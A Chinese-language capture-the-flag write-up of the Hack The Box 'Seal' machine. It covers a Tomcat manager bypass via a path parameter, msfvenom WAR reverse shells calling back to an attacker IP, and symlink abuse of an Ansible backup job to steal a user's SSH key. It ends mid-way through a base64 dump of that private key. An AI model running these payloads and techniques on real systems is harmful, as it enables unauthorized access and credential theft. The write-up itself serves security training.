Seal-htb-writeup

0x00 靶场技能介绍

章节技能：nginx配置分析、/host-manager/html访问绕过、上传war包获取反弹shell、目标用户权限组文件搜索、run.yml文件分析、软连接操作、文件传输、sudo提权

参考链接：https://www.jgeek.cn/article/117.html

参考链接：https://0xdf.gitlab.io/2021/11/13/htb-seal.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.250

2、获取下开放端口情况：

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.250 tcp
[sudo] kali 的密码：
开始对 10.10.10.250 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.250" -oG "10.10.10.250"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:47 CST
Warning: 10.10.10.250 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.250
Host is up (0.40s latency).
Not shown: 57981 closed tcp ports (reset), 7551 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
443/tcp  open  https
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 51.18 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -p"22,443,8080," "10.10.10.250"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:48 CST
Nmap scan report for 10.10.10.250
Host is up (0.34s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1
| tls-alpn: 
|_  http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http-proxy
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Sun, 21 Jan 2024 12:48:42 GMT
|     Set-Cookie: JSESSIONID=node0joxvqq12yfrlvr6cwt5k9wvw2.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Sun, 21 Jan 2024 12:48:35 GMT
|     Set-Cookie: JSESSIONID=node0f5iw5xempegh2f6jvm84gi5d0.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sun, 21 Jan 2024 12:48:36 GMT
|     Set-Cookie: JSESSIONID=node0r3w5lvmxp2on1qtg3ge5m2zz61.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.250 udp
开始对 10.10.10.250 进行nmap端口扫描...
* 正在执行udp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- -sU "10.10.10.250" -oG "10.10.10.250"-udp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:51 CST
Warning: 10.10.10.250 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.250
Host is up (0.44s latency).
All 65535 scanned ports on 10.10.10.250 are in ignored states.
Not shown: 65492 open|filtered udp ports (no-response), 43 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 77.30 seconds
* 正在对开放的端口进行udp式版本探测和系统版本探测...
sudo nmap -sV -sU -sC -p"" "10.10.10.250"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:52 CST
Error #487: Your port specifications are illegal.  Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!

3、根据443端口信息情况，绑定下本地的hosts信息

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.250 seal.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.250 seal.htb

4、查看下8080端口服务情况

http://seal.htb:8080/signin;jsessionid=node01webv6ysmi13s5xip27hbkvjg34.node0?redirect=%2F

5、注册一个账号

http://seal.htb:8080/register

shiyan
shiyan
shiyan@qq.com

6、8080端口登录进去，可以看出是一个 GitBucket 的一个系统平台，这里存在两个项目库：infra 和 seal_market

7、这个 http://seal.htb:8080/root/seal_market 路径是第一个应用程序，一个简单的网上市场应用程序，提供免费购物，避免在这种流行病的情况下拥挤，节省时间。

8、然后通过查看443端口的服务，应该就是这个应用程序

https://seal.htb/

9、在翻阅中，还是发现了一些信息的，http://seal.htb:8080/root/seal_market/issues/1 ，在这个页面上，其实是发现了2个用户ID的信息，alex 和 luis

我们不能让Tomcat启用相互身份验证吗？

可能，但为了平衡服务器负载，我们建议使用Nginx。

10、这里去查看下 nginx 的配置信息

http://seal.htb:8080/root/seal_market/blob/master/nginx/sites-enabled/default

ssl_certificate /var/www/keys/selfsigned.crt;
ssl_certificate_key /var/www/keys/selfsigned.key;
ssl_client_certificate /var/www/keys/selfsigned-ca.crt;
 
server {
	listen 443 ssl default_server;
	listen [::]:443 ssl default_server;
 
	# SSL configuration
	#
	# listen 443 ssl default_server;
	# listen [::]:443 ssl default_server;
	#
	# Note: You should disable gzip for SSL traffic.
	# See: https://bugs.debian.org/773332
	#
	# Read up on ssl_ciphers to ensure a secure configuration.
	# See: https://bugs.debian.org/765782
	#
	# Self signed certs generated by the ssl-cert package
	# Don't use them in a production server!
	#
	# include snippets/snakeoil.conf;
 
	root /var/www/html;
	ssl_protocols TLSv1.1 TLSv1.2;
	ssl_verify_client optional;
	
	# Add index.php to the list if you are using PHP
	index index.html index.htm index.nginx-debian.html;
 
	server_name _;
 
	location /manager/html {
		if ($ssl_client_verify != SUCCESS) {
			return 403;
		}
		proxy_set_header        Host $host;
		proxy_set_header        X-Real-IP $remote_addr;
		proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
		proxy_set_header        X-Forwarded-Proto $scheme;
		proxy_pass          http://localhost:8000;
		proxy_read_timeout  90;
		proxy_redirect      http://localhost:8000 https://0.0.0.0;
		# First attempt to serve request as file, then
		# as directory, then fall back to displaying a 404.
#		try_files $uri $uri/ =404;
	}
 
 
	location /admin/dashboard {
		if ($ssl_client_verify != SUCCESS) {
			return 403;
		}
		proxy_set_header        Host $host;
		proxy_set_header        X-Real-IP $remote_addr;
		proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
		proxy_set_header        X-Forwarded-Proto $scheme;
		proxy_pass          http://localhost:8000;
		proxy_read_timeout  90;
		proxy_redirect      http://localhost:8000 https://0.0.0.0;
		# First attempt to serve request as file, then
		# as directory, then fall back to displaying a 404.
#		try_files $uri $uri/ =404;
	}
 
        location /host-manager/html {
                if ($ssl_client_verify != SUCCESS) {
                        return 403;
                }
                proxy_set_header        Host $host;
                proxy_set_header        X-Real-IP $remote_addr;
                proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header        X-Forwarded-Proto $scheme;
                proxy_pass          http://localhost:8000;
                proxy_read_timeout  90;
                proxy_redirect      http://localhost:8000 https://0.0.0.0;
                # First attempt to serve request as file, then
                # as directory, then fall back to displaying a 404.
#               try_files $uri $uri/ =404;
        }
 
 
	location / {
                proxy_set_header        Host $host;
                proxy_set_header        X-Real-IP $remote_addr;
                proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header        X-Forwarded-Proto $scheme;
                proxy_pass          http://localhost:8000;
                proxy_read_timeout  90;
                proxy_redirect      http://localhost:8000 https://0.0.0.0;
	}	
	# pass PHP scripts to FastCGI server
	#
	#location ~ \.php$ {
	#	include snippets/fastcgi-php.conf;
	#
	#	# With php-fpm (or other unix sockets):
	#	fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
	#	# With php-cgi (or other tcp sockets):
	#	fastcgi_pass 127.0.0.1:9000;
	#}
 
	# deny access to .htaccess files, if Apache's document root
	# concurs with nginx's one
	#
	#location ~ /\.ht {
	#	deny all;
	#}
}

11、当路径为 /admin/dashboard 时，会请求服务器本地监听端口 8000。前置存在一个 if 判断，当 ssl_client_verify 校验成功后才能访问。

12、翻阅历史更新情况， tomcat-users.xml 文件时，发现了密码信息

http://seal.htb:8080/root/seal_market/blob/ac210325afd2f6ae17cce84a8aa42805ce5fd010/tomcat/tomcat-users.xml

<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>
</tomcat-users>

13、这里开始尝试登录 https://seal.htb/host-manager/html 地址，但是直接访问这个目录是无法访问的，通过查看 https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-web/tomcat 手册，发现绕过方法

http://www.vulnerable.com/;param=value/manager/html

https://seal.htb/;param=value/manager/html

14、这里直接使用上传war包，进行获取反弹shell

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=443 -f war -o rce.war
Payload size: 12804 bytes
Final size of war file: 12804 bytes
Saved as: rce.war

15、但是在上传的时候发现了点问题，发现提示403未授权，应该就是缺少session的原因，这里找个session给放上去不就行了？

Cookie: JSESSIONID=A55FDD58CCFC458882176EE2AFC20144; 

16、然后页面上就正常显示了

https://seal.htb/;param=value/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=6B1EF5DC0DF5C73FB4C7B0C52BF5B7B3

果然页面上显示出来了我们上传的包了

但是访问的时候，显示为500的报错，可能这里生成的war包还是有些问题

17、我们重新生成一下新的木马包

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war -o shell.war
Payload size: 1090 bytes
Final size of war file: 1090 bytes
Saved as: shell.war

18、然后我们去访问 https://seal.htb/shell/ 地址，这里成功获取到一个反弹的shell

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.250] 51192
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

19、看了下当前权限，发现还是需要提权，才能获取到第一个flag信息的

python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@seal:/var/lib/tomcat9$ 
tomcat@seal:/var/lib/tomcat9$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root root 4096 May  5  2021 .
drwxr-xr-x 20 root root 4096 May  7  2021 ..
drwxr-xr-x  9 luis luis 4096 May  7  2021 luis
tomcat@seal:/var/lib/tomcat9$ ls -la/home/luis
ls -la/home/luis
ls: invalid option -- '/'
Try 'ls --help' for more information.
tomcat@seal:/var/lib/tomcat9$ ls -la /home/luis
ls -la /home/luis
total 51320
drwxr-xr-x 9 luis luis     4096 May  7  2021 .
drwxr-xr-x 3 root root     4096 May  5  2021 ..
drwxrwxr-x 3 luis luis     4096 May  7  2021 .ansible
lrwxrwxrwx 1 luis luis        9 May  5  2021 .bash_history -> /dev/null
-rw-r--r-- 1 luis luis      220 May  5  2021 .bash_logout
-rw-r--r-- 1 luis luis     3797 May  5  2021 .bashrc
drwxr-xr-x 3 luis luis     4096 May  7  2021 .cache
drwxrwxr-x 3 luis luis     4096 May  5  2021 .config
drwxrwxr-x 6 luis luis     4096 Jan 21 12:46 .gitbucket
-rw-r--r-- 1 luis luis 52497951 Jan 14  2021 gitbucket.war
drwxrwxr-x 3 luis luis     4096 May  5  2021 .java
drwxrwxr-x 3 luis luis     4096 May  5  2021 .local
-rw-r--r-- 1 luis luis      807 May  5  2021 .profile
drwx------ 2 luis luis     4096 May  7  2021 .ssh
-r-------- 1 luis luis       33 Jan 21 12:46 user.txt
tomcat@seal:/var/lib/tomcat9$ 

20、 通过查看目标用户组的文件，发现了一些备份信息

tomcat@seal:/var/lib/tomcat9$ find / -group luis 2>/dev/null | grep -v /proc | grep -v /home
<up luis 2>/dev/null | grep -v /proc | grep -v /home
/opt/backups
/opt/backups/archives
/opt/backups/archives/backup-2024-01-21-14:30:33.gz
/opt/backups/playbook
/opt/backups/playbook/run.yml
tomcat@seal:/var/lib/tomcat9$ 

21、发现luis用户，可以对以上文件进行操作

tomcat@seal:/var/lib/tomcat9$ cat /opt/backups/playbook/run.yml
cat /opt/backups/playbook/run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/
tomcat@seal:/var/lib/tomcat9$ 

“复制文件”获取仪表板的所有文件， files 并使用 synchronize 模块将它们复制到此目录中的文件夹中。请务必注意该 copy_links=yes 指令。

“Server Backups”运行存档模块，该模块生成带有时间戳 .gz 的文件。

“Clean” 使用文件模块删除 files 目录。

为了利用这一点，我需要在 Tomcat Web 目录中寻找可以编写的内容。该 uploads 文件夹的工作原理：

22、那我们可以通过备份的形式，把 luis 用户的根目录进行备份，这样就可以获取到目标的一些信息了，比如.ssh

tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
<r/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/       
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ cd uploads/
cd uploads/
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ ls -la
ls -la
total 8
drwxrwxrwx 2 root   root   4096 Jan 21 14:35 .
drwxr-xr-x 7 root   root   4096 May  7  2021 ..
lrwxrwxrwx 1 tomcat tomcat   11 Jan 21 14:35 luis -> /home/luis/
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ cd luis
cd luis
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ ls
ls
gitbucket.war  user.txt
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ ls -la
<9/webapps/ROOT/admin/dashboard/uploads/luis$ ls -la                    
total 51320
drwxr-xr-x 9 luis luis     4096 May  7  2021 .
drwxr-xr-x 3 root root     4096 May  5  2021 ..
drwxrwxr-x 3 luis luis     4096 May  7  2021 .ansible
lrwxrwxrwx 1 luis luis        9 May  5  2021 .bash_history -> /dev/null
-rw-r--r-- 1 luis luis      220 May  5  2021 .bash_logout
-rw-r--r-- 1 luis luis     3797 May  5  2021 .bashrc
drwxr-xr-x 3 luis luis     4096 May  7  2021 .cache
drwxrwxr-x 3 luis luis     4096 May  5  2021 .config
drwxrwxr-x 6 luis luis     4096 Jan 21 12:46 .gitbucket
-rw-r--r-- 1 luis luis 52497951 Jan 14  2021 gitbucket.war
drwxrwxr-x 3 luis luis     4096 May  5  2021 .java
drwxrwxr-x 3 luis luis     4096 May  5  2021 .local
-rw-r--r-- 1 luis luis      807 May  5  2021 .profile
drwx------ 2 luis luis     4096 May  7  2021 .ssh
-r-------- 1 luis luis       33 Jan 21 12:46 user.txt
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ cd .ssh
</webapps/ROOT/admin/dashboard/uploads/luis$ cd .ssh                    
bash: cd: .ssh: Permission denied
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ ls
ls
gitbucket.war  user.txt
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ cd ../
<9/webapps/ROOT/admin/dashboard/uploads/luis$ cd ../                    
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ 

23、查看备份的情况

tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ cd ../
cd ../
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -l /opt/backups/archives/
</ROOT/admin/dashboard$ ls -l /opt/backups/archives/       
total 338676
-rw-rw-r-- 1 luis luis 115600641 Jan 21 14:35 backup-2024-01-21-14:35:32.gz
-rw-rw-r-- 1 luis luis 115600685 Jan 21 14:36 backup-2024-01-21-14:36:33.gz
-rw-rw-r-- 1 luis luis 115600731 Jan 21 14:37 backup-2024-01-21-14:37:32.gz
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ cd /opt/backups/archives/
<pps/ROOT/admin/dashboard$ cd /opt/backups/archives/       
tomcat@seal:/opt/backups/archives$ ls -la
ls -la
total 338684
drwxrwxr-x 2 luis luis      4096 Jan 21 14:37 .
drwxr-xr-x 4 luis luis      4096 Jan 21 14:37 ..
-rw-rw-r-- 1 luis luis 115600641 Jan 21 14:35 backup-2024-01-21-14:35:32.gz
-rw-rw-r-- 1 luis luis 115600685 Jan 21 14:36 backup-2024-01-21-14:36:33.gz
-rw-rw-r-- 1 luis luis 115600731 Jan 21 14:37 backup-2024-01-21-14:37:32.gz
tomcat@seal:/opt/backups/archives$ tar -xvf backup-2024-01-21-14:37:32.gz
tar -xvf backup-2024-01-21-14:37:32.gz
tar: Cannot connect to backup-2024-01-21-14: resolve failed
tomcat@seal:/opt/backups/archives$ ls
ls
backup-2024-01-21-14:35:32.gz  backup-2024-01-21-14:37:32.gz
backup-2024-01-21-14:36:33.gz  backup-2024-01-21-14:38:33.gz
tomcat@seal:/opt/backups/archives$ 

24、文件还是很多的，这里使用Base64进行文件传输是不合适的，所以还是启动一个python3 的WEB的服务进行下载吧，算了，这里文件还是太大了，我们重新软链接一下吧，直接把 .ssh 的文件目录链接下

tomcat@seal:/var/lib/tomcat9$ ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
<r/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
tomcat@seal:/var/lib/tomcat9$

25、查看信息获取情况

tomcat@seal:/var/lib/tomcat9$ ls -la /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
<r/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
total 8
drwxrwxrwx 2 root   root   4096 Jan 21 14:47 .
drwxr-xr-x 7 root   root   4096 May  7  2021 ..
lrwxrwxrwx 1 tomcat tomcat   16 Jan 21 14:47 .ssh -> /home/luis/.ssh/
tomcat@seal:/var/lib/tomcat9$ cd 

tomcat@seal:/var/lib/tomcat9$ cd /opt/backups/archives/   
cd /opt/backups/archives/
tomcat@seal:/opt/backups/archives$ ls 
ls
backup-2024-01-21-14:45:33.gz  backup-2024-01-21-14:47:32.gz
backup-2024-01-21-14:46:33.gz
tomcat@seal:/opt/backups/archives$ cp backup-2024-01-21-14:47:32.gz /tmp/backup-2024-01-21-14:47:32.gz
<1-21-14:47:32.gz /tmp/backup-2024-01-21-14:47:32.gz
tomcat@seal:/opt/backups/archives$ ls -la /tmp
ls -la /tmp
total 608
drwxrwxrwt  3 root   root     4096 Jan 21 14:48 .
drwxr-xr-x 20 root   root     4096 May  7  2021 ..
-rw-r-----  1 tomcat tomcat 609575 Jan 21 14:48 backup-2024-01-21-14:47:32.gz
drwxr-x---  2 tomcat tomcat   4096 Jan 21 12:46 hsperfdata_tomcat
tomcat@seal:/opt/backups/archives$ cd tmp
cd tmp
bash: cd: tmp: No such file or directory

tomcat@seal:/opt/backups/archives$ 
tomcat@seal:/opt/backups/archives$ cd /tmp
cd /tmp
tomcat@seal:/tmp$ ls -la
ls -la
total 608
drwxrwxrwt  3 root   root     4096 Jan 21 14:48 .
drwxr-xr-x 20 root   root     4096 May  7  2021 ..
-rw-r-----  1 tomcat tomcat 609575 Jan 21 14:48 backup-2024-01-21-14:47:32.gz
drwxr-x---  2 tomcat tomcat   4096 Jan 21 12:46 hsperfdata_tomcat
tomcat@seal:/tmp$ tar -xvf backup-2024-01-21-14:47:32.gz
tar -xvf backup-2024-01-21-14:47:32.gz
tar: Cannot connect to backup-2024-01-21-14: resolve failed
tomcat@seal:/tmp$ 
tomcat@seal:/tmp$ tar -xvf backup-2024-01-21-14:47:32.gz --force-local
tar -xvf backup-2024-01-21-14:47:32.gz --force-local
dashboard/
dashboard/scripts/
dashboard/images/
dashboard/css/
dashboard/uploads/
dashboard/bootstrap/
dashboard/index.html
dashboard/scripts/flot/
dashboard/scripts/datatables/
dashboard/scripts/jquery-ui-1.10.1.custom.min.js
dashboard/scripts/common.js
dashboard/scripts/jquery-1.9.1.min.js
dashboard/scripts/flot/jquery.flot.resize.js
dashboard/scripts/flot/jquery.flot.pie.js
dashboard/scripts/flot/jquery.flot.js
dashboard/scripts/datatables/jquery.dataTables.js
dashboard/images/jquery-ui/
dashboard/images/icons/
dashboard/images/img.jpg
dashboard/images/user.png
dashboard/images/bg.png
dashboard/images/jquery-ui/picker.png
dashboard/images/icons/css/
dashboard/images/icons/font/
dashboard/images/icons/css/font-awesome.css
dashboard/images/icons/font/fontawesome-webfont3294.ttf
dashboard/images/icons/font/fontawesome-webfontd41d.eot
dashboard/images/icons/font/fontawesome-webfont3294.eot
dashboard/images/icons/font/fontawesome-webfont3294.woff
dashboard/css/theme.css
dashboard/uploads/.ssh/
dashboard/uploads/.ssh/id_rsa
dashboard/uploads/.ssh/id_rsa.pub
dashboard/uploads/.ssh/authorized_keys
dashboard/bootstrap/css/
dashboard/bootstrap/js/
dashboard/bootstrap/img/
dashboard/bootstrap/css/bootstrap-responsive.min.css
dashboard/bootstrap/css/bootstrap.min.css
dashboard/bootstrap/js/bootstrap.min.js
dashboard/bootstrap/img/glyphicons-halflings.png
dashboard/bootstrap/img/glyphicons-halflings-white.png
tomcat@seal:/tmp$ ls
ls
backup-2024-01-21-14:47:32.gz  dashboard  hsperfdata_tomcat
tomcat@seal:/tmp$ cd dashboard
cd dashboard
tomcat@seal:/tmp/dashboard$ ls
ls
bootstrap  css  images  index.html  scripts  uploads
tomcat@seal:/tmp/dashboard$ cd uploads
cd uploads
tomcat@seal:/tmp/dashboard/uploads$ ls
ls
tomcat@seal:/tmp/dashboard/uploads$ ls -la
ls -la
total 12
drwxr-x--- 3 tomcat tomcat 4096 Jan 21 14:49 .
drwxr-x--- 7 tomcat tomcat 4096 May  7  2021 ..
drwx------ 2 tomcat tomcat 4096 May  7  2021 .ssh
tomcat@seal:/tmp/dashboard/uploads$ cd .ssh 
cd .ssh
tomcat@seal:/tmp/dashboard/uploads/.ssh$ ls -la
ls -la
total 20
drwx------ 2 tomcat tomcat 4096 May  7  2021 .
drwxr-x--- 3 tomcat tomcat 4096 Jan 21 14:49 ..
-rw-r----- 1 tomcat tomcat  563 May  7  2021 authorized_keys
-rw------- 1 tomcat tomcat 2590 May  7  2021 id_rsa
-rw-r----- 1 tomcat tomcat  563 May  7  2021 id_rsa.pub
tomcat@seal:/tmp/dashboard/uploads/.ssh$ 

26、那接下来本地存储下这个 .ssh 的秘钥吧

tomcat@seal:/tmp/dashboard/uploads/.ssh$ cat id_rsa | base64
cat id_rsa | base64
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFZRUFzM2tJU0NlZGRLYWNDUWhWY3BUVFZjTHhNOXEyaVFLemk5aHNubEV0MFo3a2NoWnJTWnNHCkRrSUQ3OWcvNFhybm9LWG0ydWQwZ21aeGRWSlVBUTMzS2czTms2Y3pESTB3ZXZyL1lmQnBDa1htNXJzbmZvNXpqRXVWR28KTVRKaE5aOGlPdTdzQ0RaWkE2c1g0OE9GdHVGNnp1VWdGcXpIcmRIclI0K1lGYXdnUDhPZ0o5TldrYXBtbXRra3hjRWJGNApuMSt2L2wrNzRrRW10aTdqVGlUU1FnUHIvVG9UZHZRdHcxMitZYWZWdEVrQi84aXBFbkFJb0QvQjZKT09kNHBQVE5nWDhSCk1QV0g5M21TdHJxYmxuTU9XSnRvOVlwTHhoTTQzdjlJNkVVamU4Z3AvRWNTcnZIREJlekVFTXpaUytJYmNQK2hudzVlbGEKZHVMbXRkVFNNUFRDV2twSTloWEhOVTluamNEK1RSUi9BOTBWSHFkcUxsYUprZ0M5enBSWEIyMDk2RFZ4RllkT0xjamdlTgozcmNuQ0FFaFE3NVZzRUhYRS9OSGdPOHpqRDJvM2NuQU96c015UXJxTlh0UGErcUhqVkRjaC9UMVRqU2xDV3hBRkh5L09JClB4QnVwRS9rYkVveTErZEpIdVIrZ0VwNnlNbGZxRnlFVmhVYkRxeWhBQUFGZ09BeHJ0WGdNYTdWQUFBQUIzTnphQzF5YzIKRUFBQUdCQUxONUNFZ25uWFNtbkFrSVZYS1UwMVhDOFRQYXRva0NzNHZZYko1UkxkR2U1SElXYTBtYkJnNUNBKy9ZUCtGNgo1NkNsNXRybmRJSm1jWFZTVkFFTjl5b056Wk9uTXd5Tk1IcjYvMkh3YVFwRjV1YTdKMzZPYzR4TGxScURFeVlUV2ZJanJ1CjdBZzJXUU9yRitQRGhiYmhlczdsSUJhc3g2M1I2MGVQbUJXc0lEL0RvQ2ZUVnBHcVpwclpKTVhCR3hlSjlmci81ZnUrSkIKSnJZdTQwNGswa0lENi8wNkUzYjBMY05kdm1HbjFiUkpBZi9JcVJKd0NLQS93ZWlUam5lS1QwellGL0VURDFoL2Q1a3JhNgptNVp6RGxpYmFQV0tTOFlUT043L1NPaEZJM3ZJS2Z4SEVxN3h3d1hzeEJETTJVdmlHM0Qvb1o4T1hwV25iaTVyWFUwakQwCndscEtTUFlWeHpWUFo0M0EvazBVZndQZEZSNm5haTVXaVpJQXZjNlVWd2R0UGVnMWNSV0hUaTNJNEhqZDYzSndnQklVTysKVmJCQjF4UHpSNER2TTR3OXFOM0p3RHM3RE1rSzZqVjdUMnZxaDQxUTNJZjA5VTQwcFFsc1FCUjh2emlEOFFicVJQNUd4SwpNdGZuU1I3a2ZvQktlc2pKWDZoY2hGWVZHdzZzb1FBQUFBTUJBQUVBQUFHQUp1QXN2eFIxc3ZMMEViRFFjWVZ6VWJ4c2F3Ck1SVHhSYXVBd2xXeFhTaXZtVUduSm93d1RsaHVrZDJUSktoQmtQVzJrVVhJNk9Xa0MraXQ5T2V2di9jZ2lUWTB4d2JtT1gKQU15bHpSMDZZNU5JdE9vTllBaVRWdXg0VzhuUXVBcXhEUlpWcWpuaFBIckZlL1VRTGxUL3Yva2hsbm5nSEhMd3V0bjA2bgpidXBlQWZIcUd6WllKaTEzRkV1OC8ya1k2VHhsSC8yV1g3V01Nc0U0S01rankvbnJVaXhUTnpTKzBRaktVZHZDR1MxUDZMCmhGQis3eE45aXRqRXRCQmlaOXA1ZmVYd0JuNmFxSWdTRnlRSmxVNGUyQ1VGVWQ1UHJraUhMZjhtWGpKSkdNSGJIbmUycnUKcDBPWFZxanhBVzNxaWZLM1VFcDBiQ0luSlM3VUo3dFI5Vkk1MlF6US9SZkdKK0NzaHRxQmVFaW9hTGZQaTlDeFo2TE40UwoxenJpYXNKZEF6QjNIYnU0TlZWT2MveGtIOW1USlEza2Y1UkdTY0NZYWJsTGpVQ09xMDVhUFZxaGFXNnR5RGFmOG9iODVxCi9zK0NZYU9yYmkxWWh4aE9NOG81TXZOenNyUzhlSWsxaFRPZjBtc0tFSjVtV28rUmZoaENqOUZURlNxeUs3OWhRQkFBQUEKd1FDZmhjNXNpK1VVK1NIZlFCZzlsbThkMVlBZm5YRFA1WDF3anorR0Z3MTVsR2JnMXg0WUJnSXowQThQaWpwWGVWdGh6MgppYis3M3ZkTlpnVUQ5dDJCMFRpd29nTXMyVWx4dVRndVdpdmI5SnhBWmRienI4Um8xWEJDVTZ3dHpRYjRlMjJsaWNpZmFhCldTL28xbVJIT09QOTBqZnBQT2J5OFdabkR1